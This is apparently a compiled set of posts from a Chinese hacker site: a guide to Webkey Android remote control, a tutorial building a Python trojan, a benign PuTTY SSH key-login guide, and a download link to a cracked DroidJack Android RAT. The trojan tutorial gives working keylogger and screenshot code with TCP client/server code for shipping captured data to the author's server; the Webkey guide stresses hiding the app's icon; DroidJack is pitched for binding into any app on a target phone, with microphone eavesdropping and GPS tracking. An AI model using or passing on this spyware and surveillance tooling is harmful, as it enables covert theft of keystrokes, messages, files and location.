中国骇客云工具远控工具之手机远控远程控制你的Android手机

谈到远程控制android手机软件,很早之前,德国开发的Teamviewer软件即已经做到在电脑和手机之间灵活的双向切换控制操作,稍微略显不足的地方就是Teamviewer只支持安卓系统的手机。现在危险漫步要给大家介绍的这款软件是Webkey,不但支持安卓系统手机的操作,同时可以摆脱数据线连接,在无线的网络中远程控制手机。这里以三星手机T959为例(很普通的手机,请不要扔番茄和鸡蛋)。点击我们下载下来的webkey.apk安装文件(可以直接通过数据线连接手机安装或是有wifi的,安装一个豌豆荚连接下,双击安装),红色圆圈出来的即是已经安装的webkey软件。

2K5N03D2H2X{K8G`M{83E)I.jpg

这样就完成了安装过程。这个软件的一个优点就是可以通过网络来执行远程控制操作,摆脱数据线的困扰,只要你连接上wifi,即可以很方便的操作。当然不可缺少的条件就是你的手机必须是root权限,之前应该是有不少合约机,出厂并未激活root.貌似现在应该大多都会有root权限了。

下面需要对webkey进行简单的设置,取消开机启动。这样一来就可以避免每次手机在换电池或是做其他操作的过程中因为重启而每次开机都启动webkey。

去除手机上方状态栏显示webkey的图标状态,尽管去除了,但是webkey-样会在系统后台继续运行。完成开机和运行状态的一个设置。

只要保证“保持与androdwebkey的连接”和“允许浏览器中注册新用户”两个选项被选中就可以。“使用此IP地址连接DynDNS”,这个选项是你有获取公网地址,并将地址解析到外网的网站上,通过这个来访问。这边就跳过,有兴趣的朋友可以去注册一个域名站点进行测试。

点击“手机昵称设置”按钮进行对呢称的简单设置。帮你的手机设置一个好记的名称。往后通过浏览器远程控制手机的时候,访问的管理地址就是Webkey的域名加上你手机昵称路径,比如这里的jihn就是你的手机昵称了。既然可以通过wifi连接网络远程控制你的手机,webkey也给出了手机在网络中自动获取的一个IP地址,你一样可以通过输入172.18.14.233来管理访问你的手机,这里172.18.14.233就是你局域网分配给你手机的IP地址。下一步,也是比较重要的一步操作,那就是用户管理了。当然要设置成不是每个用户都可以远程控制你的手机。让我们自己动手来为手机创建一个新用户吧。这样设置完成后,我们将手机和电脑都连接到互联网上之后,就可以对手机进行远程控制了。不通过手机数据线的哦。上面提到的第5个设置步骤中有讲到局域网的分配给手机的IP地址,这里也可以通过外网远程控制你的手机,也就是获知手机的公网IP的话,一样可以是手机在家,人在公司或是路上,前提是要有wifi,呵呵,连接控制你的手机是没问题的。查看手机公网地址可以通过手机浏览器访问诸如ip138或是114best来查看手机所在的公网IP地址。以下简单示范局域网内如何远程控制手机。

打开桌面的浏览器访问androidwebkey或者是192.168.1.102,就可以看到远程控制管理界面了。图片显示的页面地址源显示未知,实际上是来自美国的IP地址,只是网站数据库没有收录而已,不影响操作控制。这边就提示要求我们输入用户名和密码,也就是我们在上述操作中谈到的第6个步骤中的用户和密码。在这个简洁的管理页面中,给大家分享下远程控制管理的功能。

(1)页面布局

大致的页面布局如下:顶端是功能导航条,页面左边显示的是手机的实时远控屏幕。右边是操作的功能菜单,右下方还有个远程聊天窗口。一起来了解一下每个标签页的具体应用。

(2)电话选项卡

这是比较常用的功能,同样是登录控制台后的第一个页面。设置完成之后可以在远程界面中用鼠标直接操作你的手机,譬如设置呼叫转移。

远控区最下方的一排功能键是Webkey为手机设置的,它等同于手机上的物理按键,更有趣的是,按键的键值还可以自行更改设置。

(3)功能菜单

右边的功能菜单也很丰富,基本的远程控制操作都可以在这里实现:远程键盘、打开网址、运行程序、手机信息、关闭进程等。个人比较喜欢的是远程键盘,相信可以用键盘代替手机的输入法或者是手写,速度应该是有很大的提升。像手机信息或是关闭进程一样是很实用的一些功能。

(4) GPS

这是个很强大的功能,可以起到防止手机被盗的效果。一旦你的手机被偷走,就可以知道手机的位置。呵呵,本人手机是不怎么好,应该是不会引起兴趣了,不过一样可以起到防范未然的效果,还可以定位最后已知手机的位置。而且提供了两种定位方式,在室外可以通过GPS卫星精确定位,倘若手机在室内还可以得到运营商定位。是不是很好用的GPS呢?

(5)短信和通话列表

这两个功能很简单,可以实现远程收发短信,查看通话记录详情。这样即使你手机忘记带也可以知道手机上的一些通话来往的情况,清楚是谁发了短信给你了。并且你可以远程控制你的手机给人家回复,这一切只需要你在电脑上通过网络直接在这个管理页面操作,简单方便,快捷,不需要再时不时的担心你的手机是否随身携带或是烦恼手写输入或是手机键盘给对方发短信的速度太慢。

(6) Net

这是一个很实用的功能,前提是要拥有root权限。通过net可以帮助你了解你的手机网络流量使用情况,包括各个网络接口,也就是和tcp,udp收发包一样的记录信息,按日统计,(7)通知和终端

这两个选项卡可能对普通用户用处不大。通知的意思是Webkey会每隔半分钟刷新一次,显示未读信息及未接电话,当操作触发时,手机会按照你预先设置的提醒方式来显示内容。终端就是一个远程命令行,你可以通过它在shell命令行下面运行Linux指令。

(8)导出

这个功能也是相当的不错。不过在当你手机失窃并基本回归无望的时候才用到它。它能帮你远程获取手机里的联系人、短信、通话记录,然后就像豌豆荚或是91助手一样可以导出这些信息并保存到本地电脑硬盘中。

(10)目录浏览和SD存储卡

这两个功能就相当于是利用wifi连接网络后,在局域网内进行远程文件管理器。采用了Aj aXplorer组件,让远程文件管理也很方便。

你还可以远程从你手机里下载SD卡里的任何文件传输或者拷贝到其他位置,如果是图片文件的话,还可以远程预览图片。

结尾再和大家聊一下以下几点事项:

这个应用软件属于高级玩家应用,需要一定的动手操作能力。因为有的功能需要对手机ROOT(合约机可能不太合适做这个操作了)。

要通过电脑对手机进行远程控制,那么你的手机必须保持网络在线并连通。通过网络控制手

机时,可能产生较大流量,请确定你有足够的流量,并保证手机实时在线。建议手机还是使用wifi连接互联网网络,这样一来和电脑可以很融洽的在一个网络内进行对话操作。

好了,希望大家感兴趣的话,可以自己尝试安装软件来试试看,有兴趣的话可以到我的博客上面与危险漫步进行指导和交流。

中国骇客云教你使用Python编写木马程序

这次我们运用Python编写一个具有键盘记载、截屏以及通讯功用的简易木马,仍然选用Sublimetext2+JEDI(python自动补全插件)来写代码。首先准备好我们需求的依赖库,pythonhook和pythoncom。

假如觉得费事,你能够直接运用集成了一切我们所需求的python库的商业版Activepython。记载你所敲打的一切:编写一个keylogger说起Keylogger,大家的思想可能早已飞向带有wifi功用的mini小硬件去了。抛开高科技,我们暂且回归实质,探探简易键盘记载器的原理与完成。Pythonkeylogger键盘记载的功用的完成主要应用了pythoncom及pythonhook,然后就是对windowsAPI的各种调用。Python之所以用起来便当快捷,主要归功于这些庞大的支持库,正所谓“人生苦短,快用Python”。关键代码如下所示:

#-*-coding:utf-8-*-fromctypesimport*importpythoncomimportpyHookimportwin32clipboarduser32=windll.user32kernel32=windll.kernel32psapi=windll.psapicurrent_window=None#defget_current_process():#获取最上层的窗口句柄hwnd=user32.GetForegroundWindow()#获取进程IDpid=c_ulong(0)user32.GetWindowThreadProcessId(hwnd,byref(pid))#将进程ID存入变量中process_id="%d"%pid.value#申请内存executable=create_string_buffer("\x00"*512)h_process=kernel32.OpenProcess(0x400|0x10,False,pid)psapi.GetModuleBaseNameA(h_process,None,byref(executable),512)#读取窗口标题windows_title=create_string_buffer("\x00"*512)length=user32.GetWindowTextA(hwnd,byref(windows_title),512)#打印printprint"[PID:%s-%s-%s]"%(process_id,executable.value,windows_title.value)print#关闭handleskernel32.CloseHandle(hwnd)kernel32.CloseHandle(h_process)#定义击键监听事情函数defKeyStroke(event):globalcurrent_window#检测目的窗口能否转移(换了其他窗口就监听新的窗口)ifevent.WindowName!=current_window:current_window=event.WindowName#函数调用get_current_process()#检测击键能否常规按键(非组合键等)ifevent.Ascii>32andevent.Ascii<127:printchr(event.Ascii),else:#假如发现Ctrl+v(粘贴)事情,就把粘贴板内容记载下来ifevent.Key=="V":win32clipboard.OpenClipboard()pasted_value=win32clipboard.GetClipboardData()win32clipboard.CloseClipboard()print"[PASTE]-%s"%(pasted_value),else:print"[%s]"%event.Key,#循环监听下一个击键事情returnTrue#创立并注册hook管理器kl=pyHook.HookManager()kl.KeyDown=KeyStroke#注册hook并执行kl.HookKeyboard()pythoncom.PumpMessages()

【学问点】钩子(Hook):Windows音讯处置机制的一个平台,应用程序能够在上面设置子程以监视指定窗口的某种音讯,而且所监视的窗口能够是其他进程所创立的。编写代码时一定要留意严厉辨别大小写,检查无误后启动keylogger,然后能够尝试翻开记事本写点东西,过程中能够看到我们的keylogger窗口正在对我们的输入实时记载,如图1所示。

<mip-img src=”http://www.weixianmanbu.com/zb_users/upload/2016/07/201607041467631280829472.png” class=”mip-element mip-layout-container mip-img-loaded” style=”margin: 0px; padding: 0px; box-sizing: border-box; display: block; width: 748px; position: relative;”>

图1

切换窗口时会自动跟踪到新窗口,light教授趁机骚扰一下疯狗,能够看到我们的keylogger曾经跟踪到QQ聊天窗口,并忠实的记载下输入的一切,如图2所示。

<mip-img src=”http://www.weixianmanbu.com/zb_users/upload/2016/07/201607041467631289746044.png” class=”mip-element mip-layout-container mip-img-loaded” style=”margin: 0px; padding: 0px; box-sizing: border-box; display: block; width: 748px; position: relative;”>

图2

看看你在干什么:编写一个screenshotter截屏完成起来更简单,直接调用几个GUI相关的API即可,我们直接看代码。

#-*-coding:utf-8-*-importwin32guiimportwin32uiimportwin32conimportwin32api#获取桌面hdesktop=win32gui.GetDesktopWindow()#分辨率顺应width=win32api.GetSystemMetrics(win32con.SM_CXVIRTUALSCREEN)height=win32api.GetSystemMetrics(win32con.SM_CYVIRTUALSCREEN)left=win32api.GetSystemMetrics(win32con.SM_XVIRTUALSCREEN)top=win32api.GetSystemMetrics(win32con.SM_YVIRTUALSCREEN)#创立设备描绘表desktop_dc=win32gui.GetWindowDC(hdesktop)img_dc=win32ui.CreateDCFromHandle(desktop_dc)#创立一个内存设备描绘表mem_dc=img_dc.CreateCompatibleDC()#创立位图对象screenshot=win32ui.CreateBitmap()screenshot.CreateCompatibleBitmap(img_dc,width,height)mem_dc.SelectObject(screenshot)#截图至内存设备描绘表mem_dc.BitBlt((0,0),(width,height),img_dc,(left,top),win32con.SRCCOPY)#将截图保管到文件中screenshot.SaveBitmapFile(mem_dc,'c:\\WINDOWS\\Temp\\screenshot.bmp')#内存释放mem_dc.DeleteDC()win32gui.DeleteObject(screenshot.GetHandle())

运转之后看看效果如何,如图3所示。

<mip-img src=”http://www.weixianmanbu.com/zb_users/upload/2016/07/201607041467631310619179.png” class=”mip-element mip-layout-container mip-img-loaded” style=”margin: 0px; padding: 0px; box-sizing: border-box; display: block; width: 748px; position: relative;”>

图3

综合运用:完成一个简易木马

无论是keylogger记载下的内容,还是screenshotter截获的图片,只存在客户端是没有太大意义的,我们需求构建一个简单server和client端来停止通讯,传输记载下的内容到我们的效劳器上。

1)编写一个简单的TCPclient

#-*-coding:utf-8-*-importsocket#目的地址IP/URL及端口target_host="127.0.0.1"target_port=9999#创立一个socket对象client=socket.socket(socket.AF_INET,socket.SOCK_STREAM)#衔接主机client.connect((target_host,target_port))#发送数据client.send("GET/HTTP/1.1\r\nHOST:127.0.0.1\r\n\r\n")#接纳响应response=client.recv(4096)printresponse

2)编写一个简单的TCPserver

#-*-coding:utf-8-*-importsocketimportthreading#监听的IP及端口bind_ip="127.0.0.1"bind_port=9999server=socket.socket(socket.AF_INET,socket.SOCK_STREAM)server.bind((bind_ip,bind_port))server.listen(5)print"[*]Listeningon%s:%d"%(bind_ip,bind_port)defhandle_client(client_socket):request=client_socket.recv(1024)print"[*]Received:%s"%requestclient_socket.send("ok!")client_socket.close()whileTrue:client,addr=server.accept()print"[*]Acceptconnectionfrom:%s:%d"%(addr[0],addr[1])client_handler=threading.Thread(target=handle_client,args=(client,))client_handler.start()

开启效劳端监听,如图4所示。

<mip-img src=”http://www.weixianmanbu.com/zb_users/upload/2016/07/201607041467631323537986.png” class=”mip-element mip-layout-container mip-img-loaded” style=”margin: 0px; padding: 0px; box-sizing: border-box; display: block; width: 748px; position: relative;”>

<mip-img src=”http://www.weixianmanbu.com/zb_users/upload/2016/07/201607041467631335392821.png” class=”mip-element mip-layout-container mip-img-loaded” style=”margin: 0px; padding: 0px; box-sizing: border-box; display: block; width: 748px; position: relative;”>

执行客户端,如图5所示。

效劳端接纳到客户端的恳求并做出了响应,如图6所示。

<mip-img src=”http://www.weixianmanbu.com/zb_users/upload/2016/07/201607041467631342512153.png” class=”mip-element mip-layout-container mip-img-loaded” style=”margin: 0px; padding: 0px; box-sizing: border-box; display: block; width: 748px; position: relative;”>

图6更多关注www.hackerschina.org

最后需求做的就是把上面三个模块分离起来,一个简易的具有键盘记载、屏幕截图并能够发送内容到我们效劳端的木马就完成了。能够运用py2exe把脚本生成exe可执行文件。当然,你还能够继续发挥,加上远程控制功用。

中国骇客云教你Linux 远程登录

Linux 远程登录

Linux一般作为服务器使用,而服务器一般放在机房,你不可能在机房操作你的Linux服务器。

这时我们就需要远程登录到Linux服务器来管理维护系统。

Linux系统中是通过ssh服务实现的远程登录功能,默认ssh服务端口号为 22。

Window系统上 Linux 远程登录客户端有SecureCRT, Putty, SSH Secure Shell等,本文以Putty为例来登录远程服务器。

putty下载地址:http://www.putty.org/

如果你下载了putty,请双击putty.exe 然后弹出如下的窗口。

5_1

在Host Name( or IP address) 下面的框中输入你要登录的远程服务器IP(可以通过ifconfig命令查看服务器ip),然后回车。

5_12

此时,提示我们输入要登录的用户名。

5_13

输入root 然后回车,再输入密码,就能登录到远程的linux系统了。

5_14


使用密钥认证机制远程登录linux

SSH 为 Secure Shell 的缩写,由 IETF 的网络工作小组(Network Working Group)所制定。

SSH 为建立在应用层和传输层基础上的安全协议。

首先使用工具 PUTTYGEN.EXE 生成密钥对。打开工具PUTTYGEN.EXE后如下图所示:

5_15

该工具可以生成三种格式的key :SSH-1(RSA) SSH-2(RSA) SSH-2(DSA) ,我们采用默认的格式即SSH-2(RSA)。Number of bits in a generated key 这个是指生成的key的大小,这个数值越大,生成的key就越复杂,安全性就越高。这里我们写2048.

5_16

然后单击Generate 开始生成密钥对:

5_17

注意的是,在这个过程中鼠标要来回的动,否则这个进度条是不会动的。

5_18

到这里,密钥对已经生成了。你可以给你的密钥输入一个密码,(在Key Passphrase那里)也可以留空。然后点 Save public key 保存公钥,点 Save private Key 保存私钥。笔者建议你放到一个比较安全的地方,一来防止别人偷窥,二来防止误删除。接下来就该到远程linux主机上设置了。

1)创建目录 /root/.ssh 并设置权限

[root@localhost ~]# mkdir /root/.ssh mkdir 命令用来创建目录,以后会详细介绍,暂时只了解即可。

[root@localhost ~]# chmod 700 /root/.ssh chmod 命令是用来修改文件属性权限的,以后会详细介绍。

2)创建文件 / root/.ssh/authorized_keys

[root@localhost ~]# vim /root/.ssh/authorized_keys vim 命令是编辑一个文本文件的命令,同样在后续章节详细介绍。

3)打开刚才生成的public key 文件,建议使用写字板打开,这样看着舒服一些,复制从AAAA开头至 “—- END SSH2 PUBLIC KEY —-” 该行上的所有内容,粘贴到/root/.ssh/authorized_keys 文件中,要保证所有字符在一行。(可以先把复制的内容拷贝至记事本,然后编辑成一行载粘贴到该文件中)。

在这里要简单介绍一下,如何粘贴,用vim打开那个文件后,该文件不存在,所以vim会自动创建。按一下字母”i”然后同时按shift + Insert 进行粘贴(或者单击鼠标右键即可),前提是已经复制到剪切板中了。粘贴好后,然后把光标移动到该行最前面输入 ssh-rsa ,然后按空格。再按ESC,然后输入冒号wq 即 :wq 就保存了。格式如下图:

5_19

4)再设置putty选项,点窗口左侧的SSh –> Auth ,单击窗口右侧的Browse… 选择刚刚生成的私钥, 再点Open ,此时输入root,就不用输入密码就能登录了。

中国骇客云官网:www.hackerschina.org

5_20

如果在前面你设置了Key Passphrase ,那么此时就会提示你输入密码的。为了更加安全建议大家要设置一个Key Passphrase。

安卓手机远控神器–Droidjack(中国骇客云破解版)

手机远控软件程序破解版链接: https://pan.baidu.com/s/1dF3i9GX 密码: 2fps

Droidjack是一款针对安卓手机远程管理工具,你可以利用它在PC上对手机进行远程操控,不仅功能强大,使用也很方便。

功能特性

1、可以生成一个APK,绑定在被控手机的任何APP上
2、可在电脑端控制手机,包括浏览、传输、删除文件等
3、可进行SMS短信收发和查看功能
4、可以控制手机的电话功能
5、联系人管理
6、麦克风监听
7、GPS定位
8、APP管理

再次提醒大家,不用滥用安全工具的功能哦。